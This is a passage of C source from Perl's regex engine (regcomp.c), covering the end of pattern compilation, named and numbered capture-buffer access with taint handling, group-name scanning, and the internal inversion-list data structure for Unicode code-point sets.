if (PL_regkind[fop] == NOTHING && nop == END)
RExC_rx->extflags |= RXf_NULL;
else if ((fop == MBOL || (fop == SBOL && !first->flags)) && nop == END)
/* when fop is SBOL first->flags will be true only when it was
* produced by parsing /\A/, and not when parsing /^/. This is
* very important for the split code as there we want to
* treat /^/ as /^/m, but we do not want to treat /\A/ as /^/m.
* See rt #122761 for more details. -- Yves */
RExC_rx->extflags |= RXf_START_ONLY;
else if (fop == PLUS
&& PL_regkind[nop] == POSIXD && FLAGS(next) == _CC_SPACE
&& nop == END)
RExC_rx->extflags |= RXf_WHITE;
else if ( RExC_rx->extflags & RXf_SPLIT
&& (fop == EXACT || fop == EXACT_ONLY8 || fop == EXACTL)
&& STR_LEN(first) == 1
&& *(STRING(first)) == ' '
&& nop == END )
RExC_rx->extflags |= (RXf_SKIPWHITE|RXf_WHITE);
}
if (RExC_contains_locale) {
RXp_EXTFLAGS(RExC_rx) |= RXf_TAINTED;
}
#ifdef DEBUGGING
if (RExC_paren_names) {
RExC_rxi->name_list_idx = add_data( pRExC_state, STR_WITH_LEN("a"));
RExC_rxi->data->data[RExC_rxi->name_list_idx]
= (void*)SvREFCNT_inc(RExC_paren_name_list);
} else
#endif
RExC_rxi->name_list_idx = 0;
while ( RExC_recurse_count > 0 ) {
const regnode *scan = RExC_recurse[ --RExC_recurse_count ];
/*
* This data structure is set up in study_chunk() and is used
* to calculate the distance between a GOSUB regopcode and
* the OPEN/CURLYM (CURLYM's are special and can act like OPEN's)
* it refers to.
*
* If for some reason someone writes code that optimises
* away a GOSUB opcode then the assert should be changed to
* an if(scan) to guard the ARG2L_SET() - Yves
*
*/
assert(scan && OP(scan) == GOSUB);
ARG2L_SET( scan, RExC_open_parens[ARG(scan)] - REGNODE_OFFSET(scan));
}
Newxz(RExC_rx->offs, RExC_total_parens, regexp_paren_pair);
/* assume we don't need to swap parens around before we match */
DEBUG_TEST_r({
Perl_re_printf( aTHX_ "study_chunk_recursed_count: %lu\n",
(unsigned long)RExC_study_chunk_recursed_count);
});
DEBUG_DUMP_r({
DEBUG_RExC_seen();
Perl_re_printf( aTHX_ "Final program:\n");
regdump(RExC_rx);
});
if (RExC_open_parens) {
Safefree(RExC_open_parens);
RExC_open_parens = NULL;
}
if (RExC_close_parens) {
Safefree(RExC_close_parens);
RExC_close_parens = NULL;
}
#ifdef USE_ITHREADS
/* under ithreads the ?pat? PMf_USED flag on the pmop is simulated
* by setting the regexp SV to readonly-only instead. If the
* pattern's been recompiled, the USEDness should remain. */
if (old_re && SvREADONLY(old_re))
SvREADONLY_on(Rx);
#endif
return Rx;
}
SV*
Perl_reg_named_buff(pTHX_ REGEXP * const rx, SV * const key, SV * const value,
const U32 flags)
{
PERL_ARGS_ASSERT_REG_NAMED_BUFF;
PERL_UNUSED_ARG(value);
if (flags & RXapif_FETCH) {
return reg_named_buff_fetch(rx, key, flags);
} else if (flags & (RXapif_STORE | RXapif_DELETE | RXapif_CLEAR)) {
Perl_croak_no_modify();
return NULL;
} else if (flags & RXapif_EXISTS) {
return reg_named_buff_exists(rx, key, flags)
? &PL_sv_yes
: &PL_sv_no;
} else if (flags & RXapif_REGNAMES) {
return reg_named_buff_all(rx, flags);
} else if (flags & (RXapif_SCALAR | RXapif_REGNAMES_COUNT)) {
return reg_named_buff_scalar(rx, flags);
} else {
Perl_croak(aTHX_ "panic: Unknown flags %d in named_buff", (int)flags);
return NULL;
}
}
SV*
Perl_reg_named_buff_iter(pTHX_ REGEXP * const rx, const SV * const lastkey,
const U32 flags)
{
PERL_ARGS_ASSERT_REG_NAMED_BUFF_ITER;
PERL_UNUSED_ARG(lastkey);
if (flags & RXapif_FIRSTKEY)
return reg_named_buff_firstkey(rx, flags);
else if (flags & RXapif_NEXTKEY)
return reg_named_buff_nextkey(rx, flags);
else {
Perl_croak(aTHX_ "panic: Unknown flags %d in named_buff_iter",
(int)flags);
return NULL;
}
}
SV*
Perl_reg_named_buff_fetch(pTHX_ REGEXP * const r, SV * const namesv,
const U32 flags)
{
SV *ret;
struct regexp *const rx = ReANY(r);
PERL_ARGS_ASSERT_REG_NAMED_BUFF_FETCH;
if (rx && RXp_PAREN_NAMES(rx)) {
HE *he_str = hv_fetch_ent( RXp_PAREN_NAMES(rx), namesv, 0, 0 );
if (he_str) {
IV i;
SV* sv_dat=HeVAL(he_str);
I32 *nums=(I32*)SvPVX(sv_dat);
AV * const retarray = (flags & RXapif_ALL) ? newAV() : NULL;
for ( i=0; i<SvIVX(sv_dat); i++ ) {
if ((I32)(rx->nparens) >= nums[i]
&& rx->offs[nums[i]].start != -1
&& rx->offs[nums[i]].end != -1)
{
ret = newSVpvs("");
CALLREG_NUMBUF_FETCH(r, nums[i], ret);
if (!retarray)
return ret;
} else {
if (retarray)
ret = newSVsv(&PL_sv_undef);
}
if (retarray)
av_push(retarray, ret);
}
if (retarray)
return newRV_noinc(MUTABLE_SV(retarray));
}
}
return NULL;
}
bool
Perl_reg_named_buff_exists(pTHX_ REGEXP * const r, SV * const key,
const U32 flags)
{
struct regexp *const rx = ReANY(r);
PERL_ARGS_ASSERT_REG_NAMED_BUFF_EXISTS;
if (rx && RXp_PAREN_NAMES(rx)) {
if (flags & RXapif_ALL) {
return hv_exists_ent(RXp_PAREN_NAMES(rx), key, 0);
} else {
SV *sv = CALLREG_NAMED_BUFF_FETCH(r, key, flags);
if (sv) {
SvREFCNT_dec_NN(sv);
return TRUE;
} else {
return FALSE;
}
}
} else {
return FALSE;
}
}
SV*
Perl_reg_named_buff_firstkey(pTHX_ REGEXP * const r, const U32 flags)
{
struct regexp *const rx = ReANY(r);
PERL_ARGS_ASSERT_REG_NAMED_BUFF_FIRSTKEY;
if ( rx && RXp_PAREN_NAMES(rx) ) {
(void)hv_iterinit(RXp_PAREN_NAMES(rx));
return CALLREG_NAMED_BUFF_NEXTKEY(r, NULL, flags & ~RXapif_FIRSTKEY);
} else {
return FALSE;
}
}
SV*
Perl_reg_named_buff_nextkey(pTHX_ REGEXP * const r, const U32 flags)
{
struct regexp *const rx = ReANY(r);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REG_NAMED_BUFF_NEXTKEY;
if (rx && RXp_PAREN_NAMES(rx)) {
HV *hv = RXp_PAREN_NAMES(rx);
HE *temphe;
while ( (temphe = hv_iternext_flags(hv, 0)) ) {
IV i;
IV parno = 0;
SV* sv_dat = HeVAL(temphe);
I32 *nums = (I32*)SvPVX(sv_dat);
for ( i = 0; i < SvIVX(sv_dat); i++ ) {
if ((I32)(rx->lastparen) >= nums[i] &&
rx->offs[nums[i]].start != -1 &&
rx->offs[nums[i]].end != -1)
{
parno = nums[i];
break;
}
}
if (parno || flags & RXapif_ALL) {
return newSVhek(HeKEY_hek(temphe));
}
}
}
return NULL;
}
SV*
Perl_reg_named_buff_scalar(pTHX_ REGEXP * const r, const U32 flags)
{
SV *ret;
AV *av;
SSize_t length;
struct regexp *const rx = ReANY(r);
PERL_ARGS_ASSERT_REG_NAMED_BUFF_SCALAR;
if (rx && RXp_PAREN_NAMES(rx)) {
if (flags & (RXapif_ALL | RXapif_REGNAMES_COUNT)) {
return newSViv(HvTOTALKEYS(RXp_PAREN_NAMES(rx)));
} else if (flags & RXapif_ONE) {
ret = CALLREG_NAMED_BUFF_ALL(r, (flags | RXapif_REGNAMES));
av = MUTABLE_AV(SvRV(ret));
length = av_tindex(av);
SvREFCNT_dec_NN(ret);
return newSViv(length + 1);
} else {
Perl_croak(aTHX_ "panic: Unknown flags %d in named_buff_scalar",
(int)flags);
return NULL;
}
}
return &PL_sv_undef;
}
SV*
Perl_reg_named_buff_all(pTHX_ REGEXP * const r, const U32 flags)
{
struct regexp *const rx = ReANY(r);
AV *av = newAV();
PERL_ARGS_ASSERT_REG_NAMED_BUFF_ALL;
if (rx && RXp_PAREN_NAMES(rx)) {
HV *hv= RXp_PAREN_NAMES(rx);
HE *temphe;
(void)hv_iterinit(hv);
while ( (temphe = hv_iternext_flags(hv, 0)) ) {
IV i;
IV parno = 0;
SV* sv_dat = HeVAL(temphe);
I32 *nums = (I32*)SvPVX(sv_dat);
for ( i = 0; i < SvIVX(sv_dat); i++ ) {
if ((I32)(rx->lastparen) >= nums[i] &&
rx->offs[nums[i]].start != -1 &&
rx->offs[nums[i]].end != -1)
{
parno = nums[i];
break;
}
}
if (parno || flags & RXapif_ALL) {
av_push(av, newSVhek(HeKEY_hek(temphe)));
}
}
}
return newRV_noinc(MUTABLE_SV(av));
}
void
Perl_reg_numbered_buff_fetch(pTHX_ REGEXP * const r, const I32 paren,
SV * const sv)
{
struct regexp *const rx = ReANY(r);
char *s = NULL;
SSize_t i = 0;
SSize_t s1, t1;
I32 n = paren;
PERL_ARGS_ASSERT_REG_NUMBERED_BUFF_FETCH;
if ( n == RX_BUFF_IDX_CARET_PREMATCH
|| n == RX_BUFF_IDX_CARET_FULLMATCH
|| n == RX_BUFF_IDX_CARET_POSTMATCH
)
{
bool keepcopy = cBOOL(rx->extflags & RXf_PMf_KEEPCOPY);
if (!keepcopy) {
/* on something like
* $r = qr/.../;
* /$qr/p;
* the KEEPCOPY is set on the PMOP rather than the regex */
if (PL_curpm && r == PM_GETRE(PL_curpm))
keepcopy = cBOOL(PL_curpm->op_pmflags & PMf_KEEPCOPY);
}
if (!keepcopy)
goto ret_undef;
}
if (!rx->subbeg)
goto ret_undef;
if (n == RX_BUFF_IDX_CARET_FULLMATCH)
/* no need to distinguish between them any more */
n = RX_BUFF_IDX_FULLMATCH;
if ((n == RX_BUFF_IDX_PREMATCH || n == RX_BUFF_IDX_CARET_PREMATCH)
&& rx->offs[0].start != -1)
{
/* $`, ${^PREMATCH} */
i = rx->offs[0].start;
s = rx->subbeg;
}
else
if ((n == RX_BUFF_IDX_POSTMATCH || n == RX_BUFF_IDX_CARET_POSTMATCH)
&& rx->offs[0].end != -1)
{
/* $', ${^POSTMATCH} */
s = rx->subbeg - rx->suboffset + rx->offs[0].end;
i = rx->sublen + rx->suboffset - rx->offs[0].end;
}
else
if ( 0 <= n && n <= (I32)rx->nparens &&
(s1 = rx->offs[n].start) != -1 &&
(t1 = rx->offs[n].end) != -1)
{
/* $&, ${^MATCH}, $1 ... */
i = t1 - s1;
s = rx->subbeg + s1 - rx->suboffset;
} else {
goto ret_undef;
}
assert(s >= rx->subbeg);
assert((STRLEN)rx->sublen >= (STRLEN)((s - rx->subbeg) + i) );
if (i >= 0) {
#ifdef NO_TAINT_SUPPORT
sv_setpvn(sv, s, i);
#else
const int oldtainted = TAINT_get;
TAINT_NOT;
sv_setpvn(sv, s, i);
TAINT_set(oldtainted);
#endif
if (RXp_MATCH_UTF8(rx))
SvUTF8_on(sv);
else
SvUTF8_off(sv);
if (TAINTING_get) {
if (RXp_MATCH_TAINTED(rx)) {
if (SvTYPE(sv) >= SVt_PVMG) {
MAGIC* const mg = SvMAGIC(sv);
MAGIC* mgt;
TAINT;
SvMAGIC_set(sv, mg->mg_moremagic);
SvTAINT(sv);
if ((mgt = SvMAGIC(sv))) {
mg->mg_moremagic = mgt;
SvMAGIC_set(sv, mg);
}
} else {
TAINT;
SvTAINT(sv);
}
} else
SvTAINTED_off(sv);
}
} else {
ret_undef:
sv_set_undef(sv);
return;
}
}
void
Perl_reg_numbered_buff_store(pTHX_ REGEXP * const rx, const I32 paren,
SV const * const value)
{
PERL_ARGS_ASSERT_REG_NUMBERED_BUFF_STORE;
PERL_UNUSED_ARG(rx);
PERL_UNUSED_ARG(paren);
PERL_UNUSED_ARG(value);
if (!PL_localizing)
Perl_croak_no_modify();
}
I32
Perl_reg_numbered_buff_length(pTHX_ REGEXP * const r, const SV * const sv,
const I32 paren)
{
struct regexp *const rx = ReANY(r);
I32 i;
I32 s1, t1;
PERL_ARGS_ASSERT_REG_NUMBERED_BUFF_LENGTH;
if ( paren == RX_BUFF_IDX_CARET_PREMATCH
|| paren == RX_BUFF_IDX_CARET_FULLMATCH
|| paren == RX_BUFF_IDX_CARET_POSTMATCH
)
{
bool keepcopy = cBOOL(rx->extflags & RXf_PMf_KEEPCOPY);
if (!keepcopy) {
/* on something like
* $r = qr/.../;
* /$qr/p;
* the KEEPCOPY is set on the PMOP rather than the regex */
if (PL_curpm && r == PM_GETRE(PL_curpm))
keepcopy = cBOOL(PL_curpm->op_pmflags & PMf_KEEPCOPY);
}
if (!keepcopy)
goto warn_undef;
}
/* Some of this code was originally in C<Perl_magic_len> in F<mg.c> */
switch (paren) {
case RX_BUFF_IDX_CARET_PREMATCH: /* ${^PREMATCH} */
case RX_BUFF_IDX_PREMATCH: /* $` */
if (rx->offs[0].start != -1) {
i = rx->offs[0].start;
if (i > 0) {
s1 = 0;
t1 = i;
goto getlen;
}
}
return 0;
case RX_BUFF_IDX_CARET_POSTMATCH: /* ${^POSTMATCH} */
case RX_BUFF_IDX_POSTMATCH: /* $' */
if (rx->offs[0].end != -1) {
i = rx->sublen - rx->offs[0].end;
if (i > 0) {
s1 = rx->offs[0].end;
t1 = rx->sublen;
goto getlen;
}
}
return 0;
default: /* $& / ${^MATCH}, $1, $2, ... */
if (paren <= (I32)rx->nparens &&
(s1 = rx->offs[paren].start) != -1 &&
(t1 = rx->offs[paren].end) != -1)
{
i = t1 - s1;
goto getlen;
} else {
warn_undef:
if (ckWARN(WARN_UNINITIALIZED))
report_uninit((const SV *)sv);
return 0;
}
}
getlen:
if (i > 0 && RXp_MATCH_UTF8(rx)) {
const char * const s = rx->subbeg - rx->suboffset + s1;
const U8 *ep;
STRLEN el;
i = t1 - s1;
if (is_utf8_string_loclen((U8*)s, i, &ep, &el))
i = el;
}
return i;
}
SV*
Perl_reg_qr_package(pTHX_ REGEXP * const rx)
{
PERL_ARGS_ASSERT_REG_QR_PACKAGE;
PERL_UNUSED_ARG(rx);
if (0)
return NULL;
else
return newSVpvs("Regexp");
}
/* Scans the name of a named buffer from the pattern.
* If flags is REG_RSN_RETURN_NULL returns null.
* If flags is REG_RSN_RETURN_NAME returns an SV* containing the name
* If flags is REG_RSN_RETURN_DATA returns the data SV* corresponding
* to the parsed name as looked up in the RExC_paren_names hash.
* If there is an error throws a vFAIL().. type exception.
*/
#define REG_RSN_RETURN_NULL 0
#define REG_RSN_RETURN_NAME 1
#define REG_RSN_RETURN_DATA 2
STATIC SV*
S_reg_scan_name(pTHX_ RExC_state_t *pRExC_state, U32 flags)
{
char *name_start = RExC_parse;
SV* sv_name;
PERL_ARGS_ASSERT_REG_SCAN_NAME;
assert (RExC_parse <= RExC_end);
if (RExC_parse == RExC_end) NOOP;
else if (isIDFIRST_lazy_if_safe(RExC_parse, RExC_end, UTF)) {
/* Note that the code here assumes well-formed UTF-8. Skip IDFIRST by
* using do...while */
if (UTF)
do {
RExC_parse += UTF8SKIP(RExC_parse);
} while ( RExC_parse < RExC_end
&& isWORDCHAR_utf8_safe((U8*)RExC_parse, (U8*) RExC_end));
else
do {
RExC_parse++;
} while (RExC_parse < RExC_end && isWORDCHAR(*RExC_parse));
} else {
RExC_parse++; /* so the <- from the vFAIL is after the offending
character */
vFAIL("Group name must start with a non-digit word character");
}
sv_name = newSVpvn_flags(name_start, (int)(RExC_parse - name_start),
SVs_TEMP | (UTF ? SVf_UTF8 : 0));
if ( flags == REG_RSN_RETURN_NAME)
return sv_name;
else if (flags==REG_RSN_RETURN_DATA) {
HE *he_str = NULL;
SV *sv_dat = NULL;
if ( ! sv_name ) /* should not happen*/
Perl_croak(aTHX_ "panic: no svname in reg_scan_name");
if (RExC_paren_names)
he_str = hv_fetch_ent( RExC_paren_names, sv_name, 0, 0 );
if ( he_str )
sv_dat = HeVAL(he_str);
if ( ! sv_dat ) { /* Didn't find group */
/* It might be a forward reference; we can't fail until we
* know, by completing the parse to get all the groups, and
* then reparsing */
if (ALL_PARENS_COUNTED) {
vFAIL("Reference to nonexistent named group");
}
else {
REQUIRE_PARENS_PASS;
}
}
return sv_dat;
}
Perl_croak(aTHX_ "panic: bad flag %lx in reg_scan_name",
(unsigned long) flags);
}
#define DEBUG_PARSE_MSG(funcname) DEBUG_PARSE_r({ \
if (RExC_lastparse!=RExC_parse) { \
Perl_re_printf( aTHX_ "%s", \
Perl_pv_pretty(aTHX_ RExC_mysv1, RExC_parse, \
RExC_end - RExC_parse, 16, \
"", "", \
PERL_PV_ESCAPE_UNI_DETECT | \
PERL_PV_PRETTY_ELLIPSES | \
PERL_PV_PRETTY_LTGT | \
PERL_PV_ESCAPE_RE | \
PERL_PV_PRETTY_EXACTSIZE \
) \
); \
} else \
Perl_re_printf( aTHX_ "%16s",""); \
\
if (RExC_lastnum!=RExC_emit) \
Perl_re_printf( aTHX_ "|%4d", RExC_emit); \
else \
Perl_re_printf( aTHX_ "|%4s",""); \
Perl_re_printf( aTHX_ "|%*s%-4s", \
(int)((depth*2)), "", \
(funcname) \
); \
RExC_lastnum=RExC_emit; \
RExC_lastparse=RExC_parse; \
})
#define DEBUG_PARSE(funcname) DEBUG_PARSE_r({ \
DEBUG_PARSE_MSG((funcname)); \
Perl_re_printf( aTHX_ "%4s","\n"); \
})
#define DEBUG_PARSE_FMT(funcname,fmt,args) DEBUG_PARSE_r({\
DEBUG_PARSE_MSG((funcname)); \
Perl_re_printf( aTHX_ fmt "\n",args); \
})
/* This section of code defines the inversion list object and its methods. The
* interfaces are highly subject to change, so as much as possible is static to
* this file. An inversion list is here implemented as a malloc'd C UV array
* as an SVt_INVLIST scalar.
*
* An inversion list for Unicode is an array of code points, sorted by ordinal
* number. Each element gives the code point that begins a range that extends
* up-to but not including the code point given by the next element. The final
* element gives the first code point of a range that extends to the platform's
* infinity. The even-numbered elements (invlist[0], invlist[2], invlist[4],
* ...) give ranges whose code points are all in the inversion list. We say
* that those ranges are in the set. The odd-numbered elements give ranges
* whose code points are not in the inversion list, and hence not in the set.
* Thus, element [0] is the first code point in the list. Element [1]
* is the first code point beyond that not in the list; and element [2] is the
* first code point beyond that that is in the list. In other words, the first
* range is invlist[0]..(invlist[1]-1), and all code points in that range are
* in the inversion list. The second range is invlist[1]..(invlist[2]-1), and
* all code points in that range are not in the inversion list. The third
* range invlist[2]..(invlist[3]-1) gives code points that are in the inversion
* list, and so forth. Thus every element whose index is divisible by two
* gives the beginning of a range that is in the list, and every element whose
* index is not divisible by two gives the beginning of a range not in the
* list. If the final element's index is divisible by two, the inversion list
* extends to the platform's infinity; otherwise the highest code point in the
* inversion list is the contents of that element minus 1.
*
* A range that contains just a single code point N will look like
* invlist[i] == N
* invlist[i+1] == N+1
*
* If N is UV_MAX (the highest representable code point on the machine), N+1 is
* impossible to represent, so element [i+1] is omitted. The single element
* inversion list
* invlist[0] == UV_MAX
* contains just UV_MAX, but is interpreted as matching to infinity.
*
* Taking the complement (inverting) an inversion list is quite simple, if the
* first element is 0, remove it; otherwise add a 0 element at the beginning.
* This implementation reserves an element at the beginning of each inversion
* list to always contain 0; there is an additional flag in the header which
* indicates if the list begins at the 0, or is offset to begin at the next
* element. This means that the inversion list can be inverted without any
* copying; just flip the flag.
*
* More about inversion lists can be found in "Unicode Demystified"
* Chapter 13 by Richard Gillam, published by Addison-Wesley.
*
* The inversion list data structure is currently implemented as an SV pointing
* to an array of UVs that the SV thinks are bytes. This allows us to have an
* array of UV whose memory management is automatically handled by the existing
* facilities for SV's.
*
* Some of the methods should always be private to the implementation, and some
* should eventually be made public */
/* The header definitions are in F<invlist_inline.h> */
#ifndef PERL_IN_XSUB_RE
PERL_STATIC_INLINE UV*
S__invlist_array_init(SV* const invlist, const bool will_have_0)
{
/* Returns a pointer to the first element in the inversion list's array.
* This is called upon initialization of an inversion list. Where the
* array begins depends on whether the list has the code point U+0000 in it
* or not. The other parameter tells it whether the code that follows this
* call is about to put a 0 in the inversion list or not. The first
* element is either the element reserved for 0, if TRUE, or the element
* after it, if FALSE */
bool* offset = get_invlist_offset_addr(invlist);
UV* zero_addr = (UV *) SvPVX(invlist);
PERL_ARGS_ASSERT__INVLIST_ARRAY_INIT;
/* Must be empty */
assert(! _invlist_len(invlist));
*zero_addr = 0;
/* 1^1 = 0; 1^0 = 1 */
*offset = 1 ^ will_have_0;
return zero_addr + *offset;
}
PERL_STATIC_INLINE void
S_invlist_set_len(pTHX_ SV* const invlist, const UV len, const bool offset)
{
/* Sets the current number of elements stored in the inversion list.
* Updates SvCUR correspondingly */
PERL_UNUSED_CONTEXT;
PERL_ARGS_ASSERT_INVLIST_SET_LEN;
assert(is_invlist(invlist));
SvCUR_set(invlist,
(len == 0)
? 0
: TO_INTERNAL_SIZE(len + offset));
assert(SvLEN(invlist) == 0 || SvCUR(invlist) <= SvLEN(invlist));
}
STATIC void
S_invlist_replace_list_destroys_src(pTHX_ SV * dest, SV * src)
{
/* Replaces the inversion list in 'dest' with the one from 'src'. It
* steals the list from 'src', so 'src' is made to have a NULL list. This
* is similar to what SvSetMagicSV() would do, if it were implemented on
* inversion lists, though this routine avoids a copy */
const UV src_len = _invlist_len(src);
const bool src_offset = *get_invlist_offset_addr(src);
const STRLEN src_byte_len = SvLEN(src);
char * array = SvPVX(src);
const int oldtainted = TAINT_get;
PERL_ARGS_ASSERT_INVLIST_REPLACE_LIST_DESTROYS_SRC;
assert(is_invlist(src));
assert(is_invlist(dest));
assert(! invlist_is_iterating(src));
assert(SvCUR(src) == 0 || SvCUR(src) < SvLEN(src));
/* Make sure it ends in the right place with a NUL, as our inversion list
* manipulations aren't careful to keep this true, but sv_usepvn_flags()
* asserts it */
array[src_byte_len - 1] = '\0';
TAINT_NOT; /* Otherwise it breaks */
sv_usepvn_flags(dest,
(char *) array,
src_byte_len - 1,
/* This flag is documented to cause a copy to be avoided */
SV_HAS_TRAILING_NUL);
TAINT_set(oldtainted);
SvPV_set(src, 0);
SvLEN_set(src, 0);
SvCUR_set(src, 0);
/* Finish up copying over the other fields in an inversion list */
*get_invlist_offset_addr(dest) = src_offset;
invlist_set_len(dest, src_len, src_offset);
*get_invlist_previous_index_addr(dest) = 0;
invlist_iterfinish(dest);
}
PERL_STATIC_INLINE IV*
S_get_invlist_previous_index_addr(SV* invlist)
{
/* Return the address of the IV that is reserved to hold the cached index
* */
PERL_ARGS_ASSERT_GET_INVLIST_PREVIOUS_INDEX_ADDR;
assert(is_invlist(invlist));
return &(((XINVLIST*) SvANY(invlist))->prev_index);
}
PERL_STATIC_INLINE IV
S_invlist_previous_index(SV* const invlist)
{
/* Returns cached index of previous search */
PERL_ARGS_ASSERT_INVLIST_PREVIOUS_INDEX;
return *get_invlist_previous_index_addr(invlist);
}
PERL_STATIC_INLINE void
S_invlist_set_previous_index(SV* const invlist, const IV index)
{
/* Caches <index> for later retrieval */
PERL_ARGS_ASSERT_INVLIST_SET_PREVIOUS_INDEX;
assert(index == 0 || index < (int) _invlist_len(invlist));
*get_invlist_previous_index_addr(invlist) = index;
}
PERL_STATIC_INLINE void
S_invlist_trim(SV* invlist)
{
/* Free the not currently-being-used space in an inversion list */
/* But don't free up the space needed for the 0 UV that is always at the
* beginning of the list, nor the trailing NUL */
const UV min_size = TO_INTERNAL_SIZE(1) + 1;
PERL_ARGS_ASSERT_INVLIST_TRIM;
assert(is_invlist(invlist));
SvPV_renew(invlist, MAX(min_size, SvCUR(invlist) + 1));
}
PERL_STATIC_INLINE void
S_invlist_clear(pTHX_ SV* invlist) /* Empty the inversion list */
{
PERL_ARGS_ASSERT_INVLIST_CLEAR;
assert(is_invlist(invlist));
invlist_set_len(invlist, 0, 0);
invlist_trim(invlist);
}
#endif /* ifndef PERL_IN_XSUB_RE */
PERL_STATIC_INLINE bool
S_invlist_is_iterating(SV* const invlist)
{
PERL_ARGS_ASSERT_INVLIST_IS_ITERATING;
return *(get_invlist_iter_addr(invlist)) < (STRLEN) UV_MAX;
}
#ifndef PERL_IN_XSUB_RE
PERL_STATIC_INLINE UV
S_invlist_max(SV* const invlist)
{
/* Returns the maximum number of elements storable in the inversion list's
* array, without having to realloc() */
PERL_ARGS_ASSERT_INVLIST_MAX;
assert(is_invlist(invlist));
/* Assumes worst case, in which the 0 element is not counted in the
* inversion list, so subtracts 1 for that */
return SvLEN(invlist) == 0 /* This happens under _new_invlist_C_array */
? FROM_INTERNAL_SIZE(SvCUR(invlist)) - 1
: FROM_INTERNAL_SIZE(SvLEN(invlist)) - 1;
}
STATIC void
S_initialize_invlist_guts(pTHX_ SV* invlist, const Size_t initial_size)
{
PERL_ARGS_ASSERT_INITIALIZE_INVLIST_GUTS;
/* First 1 is in case the zero element isn't in the list; second 1 is for
* trailing NUL */
SvGROW(invlist, TO_INTERNAL_SIZE(initial_size + 1) + 1);
invlist_set_len(invlist, 0, 0);
/* Force iterinit() to be used to get iteration to work */
invlist_iterfinish(invlist);
*get_invlist_previous_index_addr(invlist) = 0;
}
SV*
Perl__new_invlist(pTHX_ IV initial_size)
{
/* Return a pointer to a newly constructed inversion list, with enough
* space to store 'initial_size' elements. If that number is negative, a
* system default is used instead */
SV* new_list;
if (initial_size < 0) {
initial_size = 10;
}
new_list = newSV_type(SVt_INVLIST);
initialize_invlist_guts(new_list, initial_size);
return new_list;
}
SV*
Perl__new_invlist_C_array(pTHX_ const UV* const list)
{
/* Return a pointer to a newly constructed inversion list, initialized to
* point to <list>, which has to be in the exact correct inversion list
* form, including internal fields. Thus this is a dangerous routine that
* should not be used in the wrong hands. The passed in 'list' contains
* several header fields at the beginning that are not part of the
* inversion list body proper */
const STRLEN length = (STRLEN) list[0];
const UV version_id = list[1];
const bool offset = cBOOL(list[2]);
#define HEADER_LENGTH 3
/* If any of the above changes in any way, you must change HEADER_LENGTH
* (if appropriate) and regenerate INVLIST_VERSION_ID by running
* perl -E 'say int(rand 2**31-1)'
*/
#define INVLIST_VERSION_ID 148565664 /* This is a combination of a version and
data structure type, so that one being
passed in can be validated to be an
inversion list of the correct vintage.
*/
SV* invlist = newSV_type(SVt_INVLIST);
PERL_ARGS_ASSERT__NEW_INVLIST_C_ARRAY;
if (version_id != INVLIST_VERSION_ID) {
Perl_croak(aTHX_ "panic: Incorrect version for previously generated inversion list");
}
/* The generated array passed in includes header elements that aren't part
* of the list proper, so start it just after them */
SvPV_set(invlist, (char *) (list + HEADER_LENGTH));
SvLEN_set(invlist, 0); /* Means we own the contents, and the system
shouldn't touch it */
*(get_invlist_offset_addr(invlist)) = offset;
/* The 'length' passed to us is the physical number of elements in the
* inversion list. But if there is an offset the logical number is one
* less than that */
invlist_set_len(invlist, length - offset, offset);
invlist_set_previous_index(invlist, 0);
/* Initialize the iteration pointer. */
invlist_iterfinish(invlist);
SvREADONLY_on(invlist);
return invlist;
}
STATIC void
S_invlist_extend(pTHX_ SV* const invlist, const UV new_max)
{
/* Grow the maximum size of an inversion list */
PERL_ARGS_ASSERT_INVLIST_EXTEND;
assert(is_invlist(invlist));
/* Add one to account for the zero element at the beginning which may not
* be counted by the calling parameters */
SvGROW((SV *)invlist, TO_INTERNAL_SIZE(new_max + 1));
}
STATIC void
S__append_range_to_invlist(pTHX_ SV* const invlist,
const UV start, const UV end)
{
/* Subject to change or removal. Append the range from 'start' to 'end' at
* the end of the inversion list. The range must be above any existing
* ones. */
UV* array;
UV max = invlist_max(invlist);
UV len = _invlist_len(invlist);
bool offset;
PERL_ARGS_ASSERT__APPEND_RANGE_TO_INVLIST;
if (len == 0) { /* Empty lists must be initialized */
offset = start != 0;
array = _invlist_array_init(invlist, ! offset);
}
else {
/* Here, the existing list is non-empty. The current max entry in the
* list is generally the first value not in the set, except when the
* set extends to the end of permissible values, in which case it is
* the first entry in that final set, and so this call is an attempt to
* append out-of-order */
UV final_element = len - 1;
array = invlist_array(invlist);
if ( array[final_element] > start
|| ELEMENT_RANGE_MATCHES_INVLIST(final_element))
{
Perl_croak(aTHX_ "panic: attempting to append to an inversion list, but wasn't at the end of the list, final=%" UVuf ", start=%" UVuf ", match=%c",
array[final_element], start,
ELEMENT_RANGE_MATCHES_INVLIST(final_element) ? 't' : 'f');
}
/* Here, it is a legal append. If the new range begins 1 above the end
* of the range below it, it is extending the range below it, so the
* new first value not in the set is one greater than the newly
* extended range. */
offset = *get_invlist_offset_addr(invlist);
if (array[final_element] == start) {
if (end != UV_MAX) {
array[final_element] = end + 1;
}
else {
/* But if the end is the maximum representable on the machine,
* assume that infinity was actually what was meant. Just let
* the range that this would extend to have no end */
invlist_set_len(invlist, len - 1, offset);
}
return;
}
}
/* Here the new range doesn't extend any existing set. Add it */
len += 2; /* Includes an element each for the start and end of range */
/* If wll overflow the existing space, extend, which may cause the array to
* be moved */
if (max < len) {
invlist_extend(invlist, len);
/* Have to set len here to avoid assert failure in invlist_array() */
invlist_set_len(invlist, len, offset);
array = invlist_array(invlist);
}
else {
invlist_set_len(invlist, len, offset);
}
/* The next item on the list starts the range, the one after that is
* one past the new range. */
array[len - 2] = start;
if (end != UV_MAX) {
array[len - 1] = end + 1;
}
else {
/* But if the end is the maximum representable on the machine, just let
* the range have no end */
invlist_set_len(invlist, len - 1, offset);
}
}
SSize_t
Perl__invlist_search(SV* const invlist, const UV cp)
{
/* Searches the inversion list for the entry that contains the input code
* point <cp>. If <cp> is not in the list, -1 is returned. Otherwise, the
* return value is the index into the list's array of the range that
* contains <cp>, that is, 'i' such that
* array[i] <= cp < array[i+1]
*/
IV low = 0;
IV mid;
IV high = _invlist_len(invlist);
const IV highest_element = high - 1;
const UV* array;
PERL_ARGS_ASSERT__INVLIST_SEARCH;
/* If list is empty, return failure. */
if (high == 0) {
return -1;
}
/* (We can't get the array unless we know the list is non-empty) */
array = invlist_array(invlist);
mid = invlist_previous_index(invlist);
assert(mid >=0);
if (mid > highest_element) {
mid = highest_element;
}
/* <mid> contains the cache of the result of the previous call to this
* function (0 the first time). See if this call is for the same result,
* or if it is for mid-1. This is under the theory that calls to this
